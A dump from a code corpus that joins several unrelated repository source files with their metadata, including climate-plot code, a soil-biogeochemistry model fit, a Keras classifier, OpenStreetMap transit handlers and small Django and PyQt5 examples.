        ax1.spines['left'].set_linewidth(2)
        ax1.spines['bottom'].set_linewidth(2)
        ax1.spines['right'].set_linewidth(2)
        ax1.spines['top'].set_linewidth(2)
        ax1.tick_params(axis='y',direction='out',which='major',pad=3,
                        width=2,color='dimgrey')
        ax1.tick_params(axis='x',direction='out',which='major',pad=3,
                        width=2,color='dimgrey')
        cs = plt.contourf(lat,lev,zdiffruns[i],limit,extend='both')
        ### Overlay climatological zonal wind contours on the U panels
        if varnames[v] == 'U':
            cs2 = plt.contour(lat,lev,zclimo[i],np.arange(-20,101,5),
                              linewidths=0.5,colors='dimgrey')
        ### Hatch statistically significant regions
        plt.contourf(latq,levq,pruns[i],colors='None',hatches=['//////'],
                     linewidth=5)
        plt.gca().invert_yaxis()
        plt.yscale('log',nonposy='clip')
        plt.xticks(np.arange(0,96,30),map(str,np.arange(0,91,30)),fontsize=5)
        plt.yticks(zscale,map(str,zscale),ha='right',fontsize=5)
        plt.minorticks_off()
        plt.xlim([0,90])
        plt.ylim([1000,10])
        ### Only the left column keeps y labels; only the bottom row keeps x
        if any([i==0,i==6,i==12,i==18]):
            ax1.tick_params(labelleft='on')
        else:
            ax1.tick_params(labelleft='off')
        if i < 18:
            ax1.tick_params(labelbottom='off')
        if any([i==0,i==6,i==12]):
            ax1.tick_params(axis='y',direction='out',which='major',pad=3,
                            width=2,color='dimgrey')
            ax1.tick_params(axis='x',direction='out',which='major',pad=3,
                            width=0,color='dimgrey')
        else:
            if i < 24 and i != 18:
                ax1.tick_params(axis='y',direction='out',which='major',pad=3,
                                width=0,color='dimgrey')
            if i < 18:
                ax1.tick_params(axis='y',direction='out',which='major',
                                pad=3,width=0,color='dimgrey')
                ax1.tick_params(axis='x',direction='out',which='major',
                                pad=3,width=0,color='dimgrey')
        ### Diverging colormaps per variable
        if varnames[v] == 'U':
            cmap = cmocean.cm.balance
            cs.set_cmap(cmap)
        elif varnames[v] == 'TEMP':
            cmap = cmocean.cm.balance
            cs.set_cmap(cmap)
        elif varnames[v] == 'GEOP':
            cmap = cmocean.cm.balance
            cs.set_cmap(cmap)
        elif varnames[v] == 'V':
            cmap = cmocean.cm.balance
            cs.set_cmap(cmap)
        elif varnames[v] == 'EGR':
            cmap = cmocean.cm.diff
            cs.set_cmap(cmap)
        ### Column (month) and row (ensemble slice) labels
        labelmonths = [r'NOV',r'DEC',r'JAN',r'FEB',r'MAR',r'APR']
        if i < 6:
            ax1.annotate(r'\textbf{%s}' % labelmonths[i],
                         xy=(0, 0),xytext=(0.5,1.13),xycoords='axes fraction',
                         fontsize=13,color='dimgrey',rotation=0,
                         ha='center',va='center')
        if i==0:
            plt.annotate(r'\textbf{Mean}',
                         xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
                         fontsize=15,color='k',rotation=90,
                         ha='center',va='center')
        elif i==6:
            plt.annotate(r'\textbf{A}',
                         xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
                         fontsize=15,color='k',rotation=90,
                         ha='center',va='center')
        elif i==12:
            plt.annotate(r'\textbf{B}',
                         xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
                         fontsize=15,color='k',rotation=90,
                         ha='center',va='center')
        elif i==18:
            plt.annotate(r'\textbf{C}',
                         xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
                         fontsize=15,color='k',rotation=90,
                         ha='center',va='center')
    ### Shared horizontal colorbar under the grid
    cbar_ax = fig.add_axes([0.312,0.07,0.4,0.02])
    cbar = fig.colorbar(cs,cax=cbar_ax,orientation='horizontal',
                        extend='both',extendfrac=0.07,drawedges=False)
    if varnames[v] == 'U':
        cbar.set_label(r'\textbf{m/s}',fontsize=9,color='dimgray',
                       labelpad=0)
    elif varnames[v] == 'TEMP':
        cbar.set_label(r'\textbf{$^\circ$C}',fontsize=9,color='dimgray',
                       labelpad=0)
    elif varnames[v] == 'GEOP':
        cbar.set_label(r'\textbf{m}',fontsize=9,color='dimgray',
                       labelpad=0)
    elif varnames[v] == 'V':
        cbar.set_label(r'\textbf{m/s}',fontsize=9,color='dimgray',
                       labelpad=0)
    elif varnames[v] == 'EGR':
        cbar.set_label(r'\textbf{1/day}',fontsize=9,color='dimgray',
                       labelpad=0)
    cbar.set_ticks(barlim)
    cbar.set_ticklabels(list(map(str,barlim)))
    cbar.ax.tick_params(axis='x', size=.01)
    cbar.outline.set_edgecolor('dimgrey')
    cbar.outline.set_linewidth(0.5)
    cbar.ax.tick_params(labelsize=6)
    ### BUGFIX: the \textbf{...} group was missing its closing brace, which
    ### makes LaTeX fail (usetex=True) when this annotation is rendered.
    plt.annotate(r'\textbf{Latitude ($^{\circ}$N)}',
                 xy=(0, 0),xytext=(0.515,0.12),xycoords='figure fraction',
                 fontsize=6,color='k',rotation=0,
                 ha='center',va='center')
    plt.subplots_adjust(hspace=0.1,bottom=0.17,top=0.93,wspace=0.1)
    plt.savefig(directoryfigure + '%s_MonthlyProfiles_100yr.png' % varnames[v],
                dpi=300)
print('Completed: Script done!')
|
[
"zlabe@uci.edu"
] |
zlabe@uci.edu
|
4063bad361a03430b9a15ee1a4e4821c7c13571b
|
6126167b27ebde0f967b275f9910ba6df0c136b3
|
/Bulk_Data/Model38/model38_fit.py
|
6a0b47a4193e3667cef98440a727c2f747844172
|
[] |
no_license
|
giannamars/Effective-Soil-Biogeochemial-Modeling
|
e8651edfbee42a05199ffe64c2155c4c085095a4
|
e1b81639b8d6ce6f5f869b04d93bcbada8d0f96f
|
refs/heads/master
| 2020-04-05T11:53:11.235389
| 2019-06-14T00:53:20
| 2019-06-14T00:53:20
| 156,848,787
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,787
|
py
|
# Fit the PECCAT38 soil-biogeochemistry model to experimental data with
# SloppyCell: load the SBML network, define bulk observables, attach
# log-normal priors around a previous fit, and run Levenberg-Marquardt.
# NOTE(review): this is Python 2 code (print statements below).
from SloppyCell.ReactionNetworks import *
import PECCAT_experiment
import numpy as np
import scipy
## Read model from SBML file
model_net = IO.from_SBML_file('PECCAT38.xml', 'base')
## define bulk measurements
# cmic: total microbial carbon (sum of the three biomass pools)
model_net.add_species('cmic', 'compartmentOne')
model_net.add_assignment_rule('cmic', 'x_1 + x_2 + x_3')
#
# doc: dissolved organic carbon
model_net.add_species('doc', 'compartmentOne')
model_net.add_assignment_rule('doc', 'x_6 + x_8')
#
# toc: total organic carbon
model_net.add_species('toc', 'compartmentOne')
model_net.add_assignment_rule('toc', 'x_1 + x_2 + x_3 + x_6 + x_7 + x_8 + x_9')
## Add inital activity fractions to parameters
model_net.add_parameter('rB0', 0.1)
model_net.add_parameter('rF0', 0.1)
#
model_net.set_var_ic('x_4', 'rB0')
model_net.set_var_ic('x_5', 'rF0')
#
# NOTE(review): this assignment rule makes x_4 track Phi21*x_8, which
# supersedes the 'rB0' initial condition set just above -- confirm intended.
model_net.add_assignment_rule('x_4', ' Phi21*x_8')
#
# co2_tot: cumulative CO2 including the time-dependent litter-input term.
model_net.add_species('co2_tot', 'compartmentOne')
model_net.add_assignment_rule('co2_tot', 'x_10 + x_11*(1-YLHiq*(((cL + (t/(t**2 + bL))**3) - cL)/(cL + (1/2*sqrt(bL))**3)) - YLLoq*(1-(((cL + (t/(t**2 + bL))**3) - cL)/(cL + (1/2*sqrt(bL))**3))))*(cL + (t/(t**2 + bL))**3)')
## Don't optimize MCPA sorption kinetics and soil properties
model_net.set_var_optimizable('Kf', False)
model_net.set_var_optimizable('nf', False)
model_net.set_var_optimizable('nc', False)
model_net.set_var_optimizable('theta', False)
model_net.set_var_optimizable('rhoB', False)
model_net.set_var_optimizable('cL', False)
model_net.set_var_optimizable('bL', False)
model_net.set_var_optimizable('YLHiq', True)
model_net.set_var_optimizable('YLLoq', True)
## Output latex'ed equations for debugging
IO.eqns_TeX_file(model_net, 'model38.tex')
## Create the model
m = Model([PECCAT_experiment.expt], [model_net])
p0= m.get_params().copy()
# Warm-start from the model-37 geodesic fit, dropping its third parameter.
p38 = Utility.load('p37.geodesics.bpkl')
#
p38 = np.delete(p38,2)
# Copy the loaded values into the KeyedList by position
# (SloppyCell parameter sets support integer indexing).
for i, (key,value) in enumerate(p0.items()):
    p0[i] = p38[i]
## Set prior ranges from value/prior_range to value*prior_range
res = Residuals.PriorInLog('YLHiq_prior', 'YLHiq', np.log(p0[10]), np.log(np.sqrt(p0[10])))
m.AddResidual(res)
res = Residuals.PriorInLog('YLLoq_prior', 'YLLoq', np.log(p0[11]), np.log(np.sqrt(p0[11])))
m.AddResidual(res)
res = Residuals.PriorInLog('YrB_prior', 'YrB', np.log(p0[12]), np.log(np.sqrt(p0[12])))
m.AddResidual(res)
res = Residuals.PriorInLog('YrF_prior', 'YrF', np.log(p0[13]), np.log(np.sqrt(p0[13])))
m.AddResidual(res)
res = Residuals.PriorInLog('YRFP_prior', 'YRFP', np.log(p0[14]), np.log(np.sqrt(p0[14])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBHiq_prior', 'YsBHiq', np.log(p0[15]), np.log(np.sqrt(p0[15])))
m.AddResidual(res)#
res = Residuals.PriorInLog('YsBLoq_prior', 'YsBLoq', np.log(p0[16]), np.log(np.sqrt(p0[16])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBPHiq_prior', 'YsBPHiq', np.log(p0[17]), np.log(np.sqrt(p0[17])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBPLoq_prior', 'YsBPLoq', np.log(p0[18]), np.log(np.sqrt(p0[18])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBPP_prior', 'YsBPP', np.log(p0[19]), np.log(np.sqrt(p0[19])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsFHiq_prior', 'YsFHiq', np.log(p0[20]), np.log(np.sqrt(p0[20])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsFLoq_prior', 'YsFLoq', np.log(p0[21]), np.log(np.sqrt(p0[21])))
m.AddResidual(res)
res = Residuals.PriorInLog('rB0_prior', 'rB0', np.log(p0[22]), np.log(np.sqrt(p0[22])))
m.AddResidual(res)
res = Residuals.PriorInLog('rF0_prior', 'rF0', np.log(p0[23]), np.log(np.sqrt(p0[23])))
m.AddResidual(res)
## Optimize to fit data
print 'Initial Cost:', m.cost(p0)
# Levenberg-Marquardt in log-parameter space (keeps parameters positive).
popt = Optimization.fmin_lm_log_params(m, p0, maxiter=10, disp=True)
# Then we run Levenberg-Marquardt
#popt = Optimization.leastsq_log_params(m, popt1)
cost_opt = m.cost(popt)
print(popt)
print 'Optimized Cost:', m.cost(popt)
Utility.save(popt, 'popt38.model.bpkl')
|
[
"noreply@github.com"
] |
giannamars.noreply@github.com
|
da5f19cab45a1557ca472a71e56dff461cc74bb2
|
335e342ee2b1f3518adbe3db2c102dab9c78fe54
|
/test_grasshopper.py
|
00695a63522ad2cc9f69592af12b69faf99c6935
|
[
"MIT"
] |
permissive
|
akarnoski/code-katas
|
070d877a196e82655ed385a447b64d3f49e9ec52
|
c90c51780174110d6292b57248b77723db6ad6ac
|
refs/heads/master
| 2021-09-03T05:22:11.298649
| 2018-01-05T23:24:01
| 2018-01-05T23:24:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
"""Test the damage function."""
import pytest
def test_combat():
"""test the nth_even function."""
from grasshopper import combat
test_value = combat(100, 5)
assert test_value == 95
|
[
"adrienne.j.karnoski@gmail.com"
] |
adrienne.j.karnoski@gmail.com
|
bdad9e2df78fc3a6cd7db2113cebb1c2f1d82c73
|
161e10d2d45e32b4066ef3c76dbb473a6b967191
|
/realtors/models.py
|
3934a4cc5a393d429f275b7de5ab1dfa216c1e61
|
[] |
no_license
|
ben-muhindi/Real-Estate
|
0603544c1b8ec365464da02d9cb65ba3d7be1993
|
3232023fbc9b549148d1be4f5a369342bc2ed9bf
|
refs/heads/master
| 2023-03-12T14:06:43.619336
| 2021-03-05T07:55:09
| 2021-03-05T07:55:09
| 287,584,923
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 488
|
py
|
from django.db import models
from datetime import datetime
class Realtor(models.Model):
    """A realtor profile: contact details plus display metadata."""
    name=models.CharField(max_length=200)
    # Photos are stored under date-based subfolders (photos/YYYY/MM/DD/).
    photo =models.ImageField(upload_to='photos/%Y/%m/%d/')
    description=models.TextField(blank=True)
    phone=models.CharField(max_length=200)
    email=models.CharField(max_length=50)
    # Flags the "most valuable" realtor, presumably for front-page highlighting.
    is_mvp =models.BooleanField(default=False)
    # NOTE(review): datetime.now is naive local time; Django projects usually
    # prefer timezone.now when USE_TZ is enabled -- confirm settings.
    hire_date =models.DateTimeField(default=datetime.now, blank=True)
    def __str__(self):
        # Show the realtor by name in the admin and in shell output.
        return self.name
|
[
"skyriters@gmail.com"
] |
skyriters@gmail.com
|
4da065e4715df88040221f0545d1cada489aae59
|
8fd5dadf6545ab7ea69ec1d36f0b84baaa340563
|
/Model/decoder.py
|
619726eee0d3052b3cc15bdfe51d71db7bdbddd0
|
[] |
no_license
|
MistQue/Adversarial-Autoencoder
|
45b386e2984500e990a5ed4295f7bcbffb089354
|
a66cd030e7169d31a8742ca20cac444b19c8e83a
|
refs/heads/master
| 2021-01-19T07:18:10.524417
| 2017-06-04T00:04:11
| 2017-06-04T00:04:11
| 87,534,766
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,102
|
py
|
import os
import sys
import numpy as np
import tensorflow as tf
from util import linear_layer, batch_norm, lrelu
class Decoder(object):
    """Fully-connected decoder network (TensorFlow 1.x graph mode).

    Maps an input tensor through a stack of linear + batch-norm + LeakyReLU
    layers and a final linear + batch-norm + sigmoid output layer.
    """
    def __init__(self, layer_list):
        # layer_list: unit counts per layer, first entry is the input
        # dimension, last entry is the output dimension.
        self.layer_list = layer_list
        self.name_scope = 'decoder'
    def get_variables(self):
        # All trainable variables created under this decoder's scope
        # (useful as an optimizer var_list).
        return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name_scope)
    def __call__(self, x, is_training, reuse):
        """Build (or reuse) the decoder graph for `x`; returns the sigmoid output."""
        h = x
        with tf.variable_scope(self.name_scope, reuse=reuse):
            # Pair consecutive layer sizes for the hidden layers; the final
            # pair (layer_list[-2], layer_list[-1]) is built separately below.
            for i, (in_dim, out_dim) in enumerate(zip(self.layer_list, self.layer_list[1:-1])):
                h = linear_layer(h, in_dim, out_dim, i)
                h = batch_norm(h, i, is_training=is_training)
                h = lrelu(h)
            h = linear_layer(h, self.layer_list[-2], self.layer_list[-1], 'output')
            h = batch_norm(h, 'output', is_training=is_training)
            ret = tf.nn.sigmoid(h)
            return ret
if __name__ == '__main__':
    # Smoke test: build a decoder graph from a 2-D latent placeholder.
    dec = Decoder([2, 100, 600, 1200, 784])
    z = tf.placeholder(tf.float32, [None, 2])
    dec(z, True, False)
|
[
"krnpcs@hotmail.com"
] |
krnpcs@hotmail.com
|
20d1eaa3378722645077004bdb9aa04769ed0a65
|
bb589dd3c74a8ba92e8bf79ce6e5c44a739f2236
|
/Week2/gcd_iter.py
|
e638f80f97eb1cf806caf3874983723c628501e2
|
[] |
no_license
|
matyh/MITx_6.00.1x
|
e49dfe2eed4948ea109ce6382564a6bfcc0fae67
|
d98645e90bb3c5380523ea2316692879ac4dd280
|
refs/heads/master
| 2022-11-23T16:50:42.236950
| 2020-07-27T12:46:45
| 2020-07-27T12:46:45
| 230,529,326
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 278
|
py
|
def gcdIter(a, b):
    """
    a, b: positive integers

    returns: a positive integer, the greatest common divisor of a & b.
    """
    # Euclidean algorithm: O(log(min(a, b))) iterations instead of the naive
    # countdown scan from min(a, b); produces identical results for
    # positive integers.
    while b:
        a, b = b, a % b
    return a
# Demo calls: expected output is 1 (17 and 12 are coprime) and 3.
print(gcdIter(17, 12))
print(gcdIter(9, 12))
|
[
"martin.hora11gmail.com"
] |
martin.hora11gmail.com
|
30b7aa92d5f6fb49fcd342a56d4100e11b24a88a
|
f1eeea3dbcf6d001028a36f332609339b1e86b78
|
/transit_to_gif_handlers.py
|
dd80bb3f4b0c85943b57e8b290e98ad2a3dcb344
|
[] |
no_license
|
Jungle-Bus/accra_transit_gif
|
f6762fd503a547cd0831c7799f31783320d9dbd8
|
95d5698a256f8594b5e3ff805d72a2603eed7ae2
|
refs/heads/master
| 2021-07-24T09:42:30.181886
| 2021-03-23T15:05:43
| 2021-03-23T15:05:43
| 108,272,294
| 0
| 1
| null | 2021-06-08T19:02:59
| 2017-10-25T13:13:25
|
Python
|
UTF-8
|
Python
| false
| false
| 5,330
|
py
|
# coding: utf-8
import osmium
import datetime
import shapely.wkb as wkblib
wkbfab = osmium.geom.WKBFactory()
class StopsHandler(osmium.SimpleHandler):
    """Collect the version history of bus-stop nodes edited after 2017-07-01."""
    def __init__(self):
        osmium.SimpleHandler.__init__(self)
        # Only keep node versions newer than this cutoff (UTC).
        self.start_date = datetime.datetime.strptime("01/07/2017", "%d/%m/%Y").replace(tzinfo=datetime.timezone.utc)
        # node id -> parallel per-version lists (version, date, name, lat, lon, geometry)
        self.stops = {}
    def node(self, n):
        # Keep nodes tagged both public_transport=platform and highway=bus_stop.
        if n.timestamp < self.start_date:
            pass
        elif ('public_transport' in n.tags and n.tags['public_transport'] == 'platform') and \
                ('highway' in n.tags and n.tags['highway'] == 'bus_stop') :
            wkb = wkbfab.create_point(n.location)
            point = wkblib.loads(wkb, hex=True)
            name = ""
            public_transport = ""  # NOTE(review): read below but never stored
            highway = ""           # NOTE(review): read below but never stored
            if "name" in n.tags:
                name = n.tags["name"]
            if "public_transport" in n.tags:
                public_transport = n.tags["public_transport"]
            if "highway" in n.tags:
                highway = n.tags["highway"]
            # First time we see this node id: create its per-version lists.
            if not n.id in self.stops:
                self.stops[n.id] = {}
                self.stops[n.id]["version"] = []
                self.stops[n.id]["date"] = []
                self.stops[n.id]["name"] = []
                self.stops[n.id]["lat"] = []
                self.stops[n.id]["lon"] = []
                self.stops[n.id]["geometry"] = []
            # Append this version's data (one entry per version seen).
            self.stops[n.id]["version"].append(n.version)
            self.stops[n.id]["date"].append(n.timestamp)
            self.stops[n.id]["name"].append(name)
            self.stops[n.id]["lat"].append(n.location.lat)
            self.stops[n.id]["lon"].append(n.location.lon)
            self.stops[n.id]["geometry"].append(point)
class RelationHandler(osmium.SimpleHandler):
    """Collect the version history of bus route relations edited after 2017-07-01."""
    def __init__(self):
        osmium.SimpleHandler.__init__(self)
        # Only keep relation versions newer than this cutoff (UTC).
        self.start_date = datetime.datetime.strptime("01/07/2017", "%d/%m/%Y").replace(tzinfo=datetime.timezone.utc)
        # relation id -> parallel per-version lists (version, date, ref, name, ways)
        self.routes = {}
    def relation(self, r):
        # Keep relations tagged type=route and route=bus.
        if r.timestamp < self.start_date:
            pass
        elif ('type' in r.tags and r.tags['type'] == 'route') and ('route' in r.tags and r.tags['route'] == 'bus') :
            name = ""
            ref = ""
            r_type = ""   # NOTE(review): assigned but never used
            route = ""    # NOTE(review): assigned but never used
            if "ref" in r.tags:
                ref = r.tags["ref"]
            if "name" in r.tags:
                name = r.tags["name"]
            # Collect the ids of the relation's way members only.
            ways = []
            for rm in r.members:
                if not rm.type == 'w': continue
                ways.append(rm.ref)
            # First time we see this relation id: create its per-version lists.
            if not r.id in self.routes:
                self.routes[r.id] = {}
                self.routes[r.id]["version"] = []
                self.routes[r.id]["date"] = []
                self.routes[r.id]["ref"] = []
                self.routes[r.id]["name"] = []
                self.routes[r.id]["ways"] = []
            self.routes[r.id]["version"].append(r.version)
            self.routes[r.id]["date"].append(r.timestamp)
            self.routes[r.id]["ref"].append(ref)
            self.routes[r.id]["name"].append(name)
            # "ways" holds, for each version, the list of that version's way ids.
            self.routes[r.id]["ways"].append(ways)
class WayHandler(osmium.SimpleHandler):
    """Keep only the latest version of each requested way (id, version, date, node refs)."""
    def __init__(self, requested_ways):
        osmium.SimpleHandler.__init__(self)
        # Collection of way ids to extract (membership-tested below).
        self.requested_ways = requested_ways
        # way id -> {"object_id", "version", "date", "nodes_ref"}
        self.ways = {}
    def way(self, w):
        if w.id in self.requested_ways:
            if not w.id in self.ways:
                self.ways[w.id] = {}
                self.ways[w.id]["object_id"] = w.id
                self.ways[w.id]["version"] = ""
                self.ways[w.id]["date"] = ""
                self.ways[w.id]["nodes_ref"] = ""
            # Overwrite only when this is a newer version than the one stored.
            if not self.ways[w.id]["version"] or self.ways[w.id]["version"] < w.version:
                self.ways[w.id]["version"] = w.version
                self.ways[w.id]["date"] = w.timestamp
                self.ways[w.id]["nodes_ref"] = [n.ref for n in w.nodes]
class NodeHandler(osmium.SimpleHandler):
    """Keep only the latest version of each requested node (id, version, lat/lon)."""
    def __init__(self, requested_nodes):
        osmium.SimpleHandler.__init__(self)
        # Collection of node ids to extract (membership-tested below).
        self.requested_nodes = requested_nodes
        # node id -> {"object_id", "version", "lat", "lon", "valid"}
        self.nodes = {}
    def node(self, n):
        if n.id in self.requested_nodes:
            if not n.id in self.nodes:
                self.nodes[n.id] = {}
                self.nodes[n.id]["object_id"] = n.id
                self.nodes[n.id]["version"] = ""
                self.nodes[n.id]["lat"] = ""
                self.nodes[n.id]["lon"] = ""
                self.nodes[n.id]["valid"] = ""
            # Overwrite only when this is a newer version than the one stored.
            if not self.nodes[n.id]["version"] or self.nodes[n.id]["version"] < n.version:
                self.nodes[n.id]["version"] = n.version
                # Reading .location can raise on deleted/invalid versions,
                # hence the broad guard; such nodes keep empty lat/lon.
                try:
                    if n.location.valid:
                        self.nodes[n.id]["lat"] = n.location.lat
                        self.nodes[n.id]["lon"] = n.location.lon
                    else:
                        print("point invalide : {:d}".format(n.id))
                except Exception as e:
                    print("exception sur le node {:d}".format(self.nodes[n.id]["object_id"]))
                    #raise
|
[
"pascal.rhod@canaltp.fr"
] |
pascal.rhod@canaltp.fr
|
a957cbb7dd30928e559ce8db5eff734935e055f5
|
68ec8d3140755c8b2d420f2bef660b75c6391cb2
|
/balance/urls.py
|
560c4485a8dd00b876f42de0de628252b028a52c
|
[] |
no_license
|
omfsakib/mealmanager
|
69fd569e95a56f322e6e8c59b9c4fc4d542a4876
|
cf2a3e317d3ad89407ac94928e947afbae7d27a2
|
refs/heads/main
| 2023-05-10T03:08:29.564272
| 2021-05-31T14:44:49
| 2021-05-31T14:44:49
| 365,000,104
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
from django.urls import path
from balance.views import balance
from . import views
# URL namespace: reverse these routes as 'balance:balance'.
app_name = 'balance'
urlpatterns = [
    # `balance` is used with .as_view(), so it is a class-based view
    # imported from balance.views.
    path('',balance.as_view(),name='balance'),
]
|
[
"noreply@github.com"
] |
omfsakib.noreply@github.com
|
601cd6fe069e3927ca1d0a53cc388d309ad53182
|
f27522a329695fae74508b374186ba9081adb863
|
/ArtificialNeuralNetwork.py
|
669656ba1db1a960f59c733ceb6fcc5f4780ec12
|
[] |
no_license
|
kennethng555/DecisionTree
|
242a6b7469d5d2d5b8f4cf59ada3b64172979b14
|
69d2a67d2d7f09e3df3e70e8c972bcf6559f0848
|
refs/heads/main
| 2023-01-20T07:03:55.840814
| 2020-11-28T22:48:05
| 2020-11-28T22:48:05
| 316,822,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,148
|
py
|
# -*- coding: utf-8 -*-
import tensorflow as tf
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
import keras
from keras.models import Sequential
from keras.layers import Dense
from sklearn.model_selection import train_test_split
def get_metrics(y, y_pred):
    """Compute accuracy, sensitivity and specificity for binary labels.

    y      -- sized iterable of true labels (0 or 1)
    y_pred -- iterable of predicted labels (0 or 1), aligned with y

    Returns a tuple (accuracy, sensitivity, specificity).
    Raises ZeroDivisionError when y is empty or contains only one class,
    matching the original behaviour.
    """
    tp = tn = fp = fn = 0
    # Tally the confusion-matrix cells in one pass; zip replaces the
    # original index-based loop with identical pairing semantics.
    for truth, pred in zip(y, y_pred):
        if truth == 1 and pred == 1:
            tp += 1
        elif truth == 1 and pred == 0:
            fn += 1
        elif truth == 0 and pred == 1:
            fp += 1
        else:
            tn += 1
    sen = tp / (fn + tp)       # true-positive rate (recall)
    spec = tn / (tn + fp)      # true-negative rate
    acc = (tp + tn) / len(y)   # overall fraction correct
    return acc, sen, spec
# import data: every column but the last is a feature, the last is the
# binary purchase label.
df = pd.read_csv('Social_Network_Ads.csv')
X = df.iloc[:, :-1].values
y = df.iloc[:, -1].values
# split train test (70/30, fixed seed for reproducibility)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)
# feature scaling: fit on train only, then apply to test (avoids leakage)
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# ANN
classifier = Sequential()
# input layer
# NOTE(review): `init=` is the Keras 1 keyword; Keras 2 renamed it to
# `kernel_initializer` -- confirm the installed Keras version.
classifier.add(Dense(6, init = 'uniform', input_dim = len(X_train[0]), activation = 'relu'))
# hidden layer
classifier.add(Dense(8, init = 'uniform', activation = 'relu'))
# output layer: sigmoid gives P(class == 1)
classifier.add(Dense(1, activation = 'sigmoid'))
# compile ann
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
classifier.fit(X_train, y_train, batch_size = 5, epochs = 100)
# predict probabilities, then round to hard 0/1 labels
y_predtr = classifier.predict(X_train)
y_predte = classifier.predict(X_test)
y_predtr = np.round(y_predtr)
y_predte = np.round(y_predte)
acc_train, sen_train, spec_train = get_metrics(y_train, y_predtr)
acc_test, sen_test, spec_test = get_metrics(y_test, y_predte)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_predte)
print("\nTrain Accuracy: ", acc_train)
print("Train Sensitivity: ", sen_train)
print("Train Specificity: ", spec_train)
print("\nTest Accuracy: ", acc_test)
print("Test Sensitivity: ", sen_test)
print("Test Specificity: ", spec_test)
|
[
"noreply@github.com"
] |
kennethng555.noreply@github.com
|
ea2c6ab46d0624a5e7a2f87f5ac7640169f8fe13
|
ca2f18ee97d16afe450b1ed193006757779d0ac6
|
/多线程处理/main2.py
|
ee08cb0e518c5a48e2fe749fed0e25aa1005ca93
|
[] |
no_license
|
penpen456/pyqt5_test
|
db6cc8e1ad058d7caeb2df73b05c255a7a1ba115
|
57c8273ebef77988c6637cdc93440a6f500553ac
|
refs/heads/master
| 2020-06-29T09:56:48.249971
| 2020-01-13T10:26:33
| 2020-01-13T10:26:33
| 200,505,334
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 855
|
py
|
import sys
import time
import threading
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.QtCore import QThread, pyqtSignal
from usetimesleep import Ui_MainWindow
class MyWindow(QMainWindow, Ui_MainWindow):
    """Main window: a button launches a worker thread whose result fills the text box."""
    def __init__(self, parent=None):
        super().__init__(parent)
        self.setupUi(self)
        # Worker thread is created once and reused across button clicks.
        self.t = MyThread()
        self.pushButton.clicked.connect(self.start)
        # The worker's signal delivers its result back on the GUI thread.
        self.t.signal.connect(self.printt)
    def start(self):
        # Launch the worker thread.
        self.t.start()
    def printt(self, a):
        # Slot: display the worker's result string in the text edit.
        self.textEdit.setText(a)
class MyThread(QThread):
    """Worker thread: sleeps 6 seconds, then emits the string '123'."""
    # Signal carrying the result string back to the GUI thread.
    signal = pyqtSignal(str)
    def __init__(self):
        super().__init__()
    def run(self):
        # Blocking "work" happens here, off the GUI thread, so the
        # window stays responsive while it runs.
        time.sleep(6)
        self.signal.emit('123')
if __name__ == "__main__":
app = QApplication(sys.argv)
main = MyWindow()
main.show()
sys.exit(app.exec_())
|
[
"1553821308@qq.com"
] |
1553821308@qq.com
|
689fb824309a4ab2169c0a15a96b15566519b11e
|
9c436a0361e265f22f3221d93c33340255cb1bda
|
/Medclapp_Final/Admin_Section/apps.py
|
e2a828de7ededa191f386872845b2a2393f5b3e9
|
[] |
no_license
|
suryarajps/medclappCustomerAPI
|
b6787f339a2b996817193c093809c0d96b4e0fcf
|
ad1e92e36aa76651cb941a5f0a3d015b5464d5fd
|
refs/heads/main
| 2023-02-28T04:47:18.396500
| 2021-02-09T04:02:31
| 2021-02-09T04:02:31
| 336,484,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 100
|
py
|
from django.apps import AppConfig
class AdminSectionConfig(AppConfig):
    """Django app configuration for the Admin_Section app."""
    name = 'Admin_Section'
|
[
"surya@vozinno.com"
] |
surya@vozinno.com
|
c0c140eb3a317927b21bec466849ee3c444182a8
|
7e1c2b653b8e91228579015d15266116fd2d5c12
|
/CV_analysis.py
|
90ac02d69fbfabc299947a5298926b08b07d1c10
|
[] |
no_license
|
Eloviyo/Semiconductor-detector-lab-analysis
|
f1e7505c305ee1e02c43017fa91711c13afcf518
|
bf165ac68f5f3e30d330c58a451b530ddf98c03d
|
refs/heads/master
| 2022-04-24T04:34:31.601928
| 2020-04-27T22:39:22
| 2020-04-27T22:39:22
| 259,122,271
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,230
|
py
|
'''This code plots the CV measurement figures from files located in the 'data' folder'''
__author__ = "Shirajum Monira"
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import numpy as np
import math
import glob
def straight_lines(x, a, b):
    """Linear model a*x + b, used as the fit function for the 1/C^2 lines."""
    return a * x + b
file = sorted(glob.glob('*.txt')) #alphabetically sorted list of all .txt files in the cwd
#guess values for the straight line fitting (slope, intercept)
guess1 = (0.00015,0.012)
guess2 = (0.0006,0)
guess3 = (-0.000183,0.011)
guess4 = (-0.000275,0)
